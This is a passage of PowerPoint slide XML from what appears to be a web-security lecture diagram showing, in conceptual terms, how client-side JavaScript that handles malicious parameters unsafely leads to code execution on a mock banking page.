          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" indent="-847">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>THE CLIENT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>manner,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>causing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709245" y="5254956"/>
            <a:ext cx="1651847" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118051" y="4668628"/>
            <a:ext cx="67733"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6933"/>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gin</a:t>
            </a:r>
            <a:endParaRPr sz="133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1217168" y="4630908"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="912875" y="3473180"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1653540" y="3473180"/>
              <a:ext cx="460235" cy="150866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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37" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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38" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1860794" y="3604245"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="912875" y="3700251"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="954683" y="3734722"/>
              <a:ext cx="1121410" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1121410">
                  <a:moveTo>
                    <a:pt x="1120787" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2087281" y="4752070"/>
            <a:ext cx="97367" cy="40909"/>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6933"/>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:endParaRPr sz="133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1360745" y="4695415"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="1020558" y="3521561"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1655064" y="3535667"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>
              <a:ext cx="365125" cy="55880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="365125" h="55879">
                  <a:moveTo>
                    <a:pt x="364655" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="55473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364655" y="55473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364655" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>
              <a:ext cx="365125" cy="55880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="365125" h="55879">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="364655" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364655" y="55473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="55473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1020558" y="3521561"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641754" y="5158094"/>
            <a:ext cx="1134533" cy="120610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="233674">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>bank</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ont</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr sz="667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204976" y="4941817"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="903732" y="3706362"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="903732" y="3706362"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 50"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>
              <a:ext cx="277495" cy="349250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="277494" h="349250">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="277418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277418" y="348907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="348907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7EBB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="960221" y="3762463"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233680" h="154304">
                  <a:moveTo>
                    <a:pt x="233057" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="153885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233057" y="153885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233057" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259096" y="5060638"/>
            <a:ext cx="369993" cy="81817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="133">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143082" marR="154936"/>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ccoun</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ts  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ill</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ay  Mail </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tra</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ns</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ers</a:t>
            </a:r>
            <a:endParaRPr sz="133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
